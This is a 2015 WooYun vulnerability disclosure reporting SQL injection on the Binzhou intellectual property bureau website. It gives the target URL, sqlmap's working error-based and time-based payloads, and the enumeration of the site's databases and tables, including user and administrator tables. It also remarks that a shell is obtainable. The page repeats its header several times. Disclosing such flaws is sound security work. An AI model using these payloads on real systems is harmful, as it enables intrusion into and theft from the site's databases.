滨州市知识产权局存在SQL注射。可shell | wooyun-2015-0111402| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111402

漏洞标题：滨州市知识产权局存在SQL注射。可shell

漏洞作者： Yang

提交时间：2015-05-25 17:20

修复时间：2015-07-14 01:04

公开时间：2015-07-14 01:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-25：细节已通知厂商并且等待厂商处理中
2015-05-30：厂商已经确认，细节仅向厂商公开
2015-06-09：细节向核心白帽子及相关领域专家公开
2015-06-19：细节向普通白帽子公开
2015-06-29：细节向实习白帽子公开
2015-07-14：细节向公众公开

简要描述：

滨州市知识产权局存在SQL注射。可shell

详细说明：

滨州市知识产权局又名黄河三角洲知识产权
http://www.bzipp.cn/news/list.aspx?navId=0202

sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Parameter: navId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: navId=0202' AND 2794=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2794=2794) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(122)+CHAR(113))) AND 'OudY'='OudY
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: navId=0202' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: navId (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: navId=0202' AND 2794=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2794=2794) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(122)+CHAR(113))) AND 'OudY'='OudY
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: navId=0202' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebDB
[*] zscq
[*] zscqj
sqlmap identified the following injection points with a total of 0

[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebDB
[*] zscq
[*] zscqj
Database: WebDB
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.Opus                                         | 9       |
| dbo.Users                                        | 6       |
| dbo.Hobby                                        | 3       |
| dbo.PersonType                                   | 3       |
+--------------------------------------------------+---------+
Database: zscqj
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.a42CityPatentInfoFileFromProvince            | 1950    |
| dbo.a42CityPatentInfoFileFromProvinceForDistrict | 1636    |
| dbo.aPublicModule1SmsSendInfo                    | 900     |
| dbo.a42SectorTown                                | 104     |
| dbo.a1User                                       | 68      |
| dbo.aPublicModule2News                           | 52      |
| dbo.a6PatentInfringeProof                        | 39      |
| dbo.a41PatentStateQuery                          | 25      |
| dbo.a6SafeguardRightOnLine                       | 23      |
| dbo.a3PubishTransaction                          | 16      |
| dbo.a41PatentQueryForFee                         | 16      |
| dbo.a41FocusFieldsForEnterprise                  | 15      |
| dbo.a1UserType                                   | 13      |
| dbo.a2TrainEFile                                 | 10      |
| dbo.a42County                                    | 10      |
| dbo.a4PatentDeclaration                          | 9       |
| dbo.aPublicModuleTopic                           | 9       |
| dbo.aPublicModuleBoard                           | 8       |
| dbo.aPublicModuleMessageOnline                   | 8       |
| dbo.a43DeclareActivityType                       | 6       |
| dbo.aPublicModule2NewsCategory                   | 6       |
| dbo.a3TransactionType                            | 5       |
| dbo.a4DpersonType                                | 5       |
| dbo.a81PLaws                                     | 5       |
| dbo.a44GovFilesTransferedToCounty                | 4       |
| dbo.a83PatentReport                              | 4       |
| dbo.a2Fftype                                     | 3       |
| dbo.a2TrainEFileType                             | 3       |
| dbo.a3CorprateTransState                         | 3       |
| dbo.a4AuditState                                 | 3       |
| dbo.a4PatentType                                 | 3       |
| dbo.a82StatisticInfo                             | 3       |
| dbo.aPublicModuleMessageState                    | 3       |
| dbo.aPublicModulePantentLaw                      | 3       |
| dbo.aPublicModule1SystemSectorInvolveSms         | 2       |
| dbo.aPublicModulePatentLawCategory               | 2       |
| dbo.sysdiagrams                                  | 2       |
| dbo.a2ExamFAQ                                    | 1       |
| dbo.a2TrainActivity                              | 1       |
| dbo.a43DeclareActivity                           | 1       |
| dbo.a43DeclareActivityFileDeliverToApplicant     | 1       |
| dbo.a5Deputy                                     | 1       |
| dbo.a7LeavedMessageBoard                         | 1       |
+--------------------------------------------------+---------+
Database: zscq
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.news_info                                    | 312     |
| dbo.user_info                                    | 177     |
| dbo.jiaoyi_info                                  | 124     |
| dbo.top_menu                                     | 64      |
| dbo.D99_CMD                                      | 26      |
| dbo.news_nav                                     | 22      |
| dbo.liucheng                                     | 19      |
| dbo.pangolin_test_table                          | 15      |
| dbo.liuyan                                       | 14      |
| dbo.jiaoyi_nav                                   | 3       |
| dbo.zixun                                        | 3       |
| dbo.administrator                                | 1       |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.MSdbms_datatype_mapping                      | 325     |
| dbo.sysdatatypemappings                          | 325     |
| dbo.MSdbms_map                                   | 248     |
| dbo.MSdatatype_mappings                          | 174     |
| dbo.MSdbms_datatype                              | 141     |
| dbo.syscategories                                | 21      |
| dbo.backupfile                                   | 14      |
| dbo.backupfilegroup                              | 7       |
| dbo.backupmediafamily                            | 7       |
| dbo.backupmediaset                               | 7       |
| dbo.backupset                                    | 7       |
| dbo.MSdbms                                       | 7       |
| dbo.sysmail_configuration                        | 7       |
| dbo.restorefile                                  | 4       |
| dbo.sysdtscategories                             | 3       |
| dbo.restorefilegroup                             | 2       |
| dbo.restorehistory                               | 2       |
| dbo.sysdtspackagefolders90                       | 2       |
| dbo.sysdbmaintplans                              | 1       |
| dbo.sysmail_servertype                           | 1       |
| dbo.sysoriginatingservers_view                   | 1       |
| dbo.systargetservers_view                        | 1       |
+--------------------------------------------------+---------+
Database: ReportServer
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.ConfigurationInfo                            | 17      |
| dbo.Roles                                        | 8       |
| dbo.PolicyUserRole                               | 4       |
| dbo.Users                                        | 3       |
| dbo.Keys                                         | 2       |
| dbo.Policies                                     | 2       |
| dbo.SecData                                      | 2       |
| dbo.Catalog                                      | 1       |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 67941   |
| sys.sysmessages                                  | 67941   |
| sys.syscolumns                                   | 11156   |
| sys.all_parameters                               | 6697    |
| sys.system_parameters                            | 6697    |
| sys.trace_subclass_values                        | 4722    |
| sys.all_columns                                  | 4254    |
| sys.trace_event_bindings                         | 3958    |
| sys.system_columns                               | 3696    |
| sys.dm_os_memory_objects                         | 3385    |
| sys.syscomments                                  | 2748    |
| sys.dm_os_ring_buffers                           | 2629    |
| dbo.spt_values                                   | 2346    |
| sys.dm_os_memory_cache_entries                   | 2308    |
| sys.dm_os_buffer_descriptors                     | 2096    |
| sys.all_objects                                  | 1808    |
| sys.sysobjects                                   | 1808    |
| sys.system_objects                               | 1741    |
| sys.database_permissions                         | 1650    |
| sys.syspermissions                               | 1649    |
| sys.sysprotects                                  | 1645    |
| sys.all_sql_modules                              | 1591    |
| sys.system_sql_modules                           | 1589    |
| sys.syscacheobjects                              | 1429    |
| sys.dm_exec_cached_plans                         | 1168    |
| sys.dm_os_virtual_address_dump                   | 1024    |
| sys.dm_os_performance_counters                   | 776     |
| sys.sysperfinfo                                  | 776     |
| sys.system_internals_partition_columns           | 693     |
| sys.columns                                      | 558     |
| sys.dm_exec_query_transformation_stats           | 376     |
| sys.stats_columns                                | 290     |
| sys.all_views                                    | 284     |
| sys.system_views                                 | 284     |
| sys.dm_db_index_usage_stats                      | 260     |
| sys.index_columns                                | 219     |
| sys.sysindexkeys                                 | 219     |
| sys.dm_os_wait_stats                             | 194     |
| sys.event_notification_event_types               | 193     |
| sys.sysindexes                                   | 172     |
| sys.trace_events                                 | 171     |
| sys.stats                                        | 166     |
| sys.dm_os_memory_clerks                          | 146     |
| sys.dm_os_latch_stats                            | 136     |
| sys.dm_exec_query_stats                          | 130     |
| sys.dm_os_memory_cache_clock_hands               | 124     |
| sys.syscharsets                                  | 114     |
| sys.allocation_units                             | 112     |
| sys.system_internals_allocation_units            | 112     |
| sys.dm_db_partition_stats                        | 101     |
| sys.indexes                                      | 101     |
| sys.partitions                                   | 101     |
| sys.system_internals_partitions                  | 101     |
| sys.system_components_surface_area_configuration | 98      |
| sys.xml_schema_facets                            | 97      |
| sys.xml_schema_components                        | 93      |
| sys.xml_schema_types                             | 77      |
| sys.dm_os_loaded_modules                         | 71      |
| sys.objects                                      | 67      |
| sys.trace_columns                                | 65      |
| sys.configurations                               | 62      |
| sys.dm_os_memory_cache_counters                  | 62      |
| sys.sysconfigures                                | 62      |
| sys.syscurconfigs                                | 62      |
| INFORMATION_SCHEMA.COLUMNS                       | 50      |
| sys.fulltext_document_types                      | 50      |
| sys.dm_os_threads                                | 49      |
| sys.dm_os_memory_cache_hash_tables               | 45      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES             | 44      |
| sys.dm_os_worker_local_storage                   | 41      |
| sys.dm_os_workers                                | 41      |
| sys.dm_exec_query_optimizer_info                 | 38      |
| sys.dm_os_memory_pools                           | 35      |
| sys.syslanguages                                 | 33      |
| sys.dm_os_tasks                                  | 28      |
| sys.systypes                                     | 27      |
| sys.types                                        | 27      |
| sys.sysprocesses                                 | 24      |
| sys.dm_db_session_space_usage                    | 22      |
| sys.dm_db_task_space_usage                       | 22      |
| sys.dm_exec_sessions                             | 22      |
| sys.securable_classes                            | 21      |
| sys.server_principals                            | 21      |
| sys.trace_categories                             | 21      |
| sys.dm_tran_active_transactions                  | 20      |
| sys.dm_tran_database_transactions                | 20      |
| sys.database_principals                          | 19      |
| sys.server_permissions                           | 19      |
| sys.sysusers                                     | 19      |
| sys.master_files                                 | 18      |
| sys.sysaltfiles                                  | 18      |
| INFORMATION_SCHEMA.SCHEMATA                      | 17      |
| sys.dm_exec_requests                             | 17      |
| sys.fulltext_languages                           | 17      |
| sys.schemas                                      | 17      |
| sys.xml_schema_component_placements              | 17      |
| sys.service_message_types                        | 14      |
| sys.xml_schema_attributes                        | 14      |
| sys.dm_os_stacks                                 | 13      |
| sys.syslogins                                    | 12      |
| sys.dm_os_waiting_tasks                          | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.dm_os_schedulers                             | 10      |
| sys.database_mirroring                           | 9       |
| sys.database_recovery_status                     | 9       |
| sys.databases                                    | 9       |
| sys.sysdatabases                                 | 9       |
| sys.crypt_properties                             | 8       |
| INFORMATION_SCHEMA.TABLES                        | 6       |
| sys.server_role_members                          | 6       |
| sys.service_contracts                            | 6       |
| sys.syslockinfo                                  | 6       |
| sys.tables                                       | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| sys.certificates                                 | 5       |
| sys.endpoints                                    | 5       |
| sys.dm_tran_locks                                | 4       |
| dbo.MSreplication_options                        | 3       |
| sys.database_role_members                        | 3       |
| sys.dm_clr_properties                            | 3       |
| sys.dm_exec_connections                          | 3       |
| sys.dm_os_hosts                                  | 3       |
| sys.identity_columns                             | 3       |
| sys.internal_tables                              | 3       |
| sys.login_token                                  | 3       |
| sys.procedures                                   | 3       |
| sys.service_queue_usages                         | 3       |
| sys.service_queues                               | 3       |
| sys.services                                     | 3       |
| sys.sysmembers                                   | 3       |
| sys.syssegments                                  | 3       |
| sys.xml_schema_namespaces                        | 3       |
| INFORMATION_SCHEMA.ROUTINES                      | 2       |
| sys.database_files                               | 2       |
| sys.dm_broker_queue_monitors                     | 2       |
| sys.dm_fts_memory_pools                          | 2       |
| sys.key_encryptions                              | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sql_modules                                  | 2       |
| sys.sysfiles                                     | 2       |
| sys.tcp_endpoints                                | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.data_spaces                                  | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_db_file_space_usage                       | 1       |
| sys.dm_exec_background_job_queue_stats           | 1       |
| sys.dm_os_sys_info                               | 1       |
| sys.dm_tran_current_transaction                  | 1       |
| sys.extended_procedures                          | 1       |
| sys.filegroups                                   | 1       |
| sys.linked_logins                                | 1       |
| sys.routes                                       | 1       |
| sys.servers                                      | 1       |
| sys.symmetric_keys                               | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysoledbusers                                | 1       |
| sys.sysservers                                   | 1       |
| sys.traces                                       | 1       |
| sys.user_token                                   | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+

漏洞证明：

有这权限不就shell 么

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-05-30 01:02

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给山东分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111402

漏洞标题：滨州市知识产权局存在SQL注射。可shell

相关厂商：滨州市知识产权局

漏洞作者： Yang

提交时间：2015-05-25 17:20

修复时间：2015-07-14 01:04

公开时间：2015-07-14 01:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0111402

漏洞标题：滨州市知识产权局存在SQL注射。可shell

相关厂商：滨州市知识产权局

漏洞作者： Yang

提交时间：2015-05-25 17:20

修复时间：2015-07-14 01:04

公开时间：2015-07-14 01:04

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：12

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0111402"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：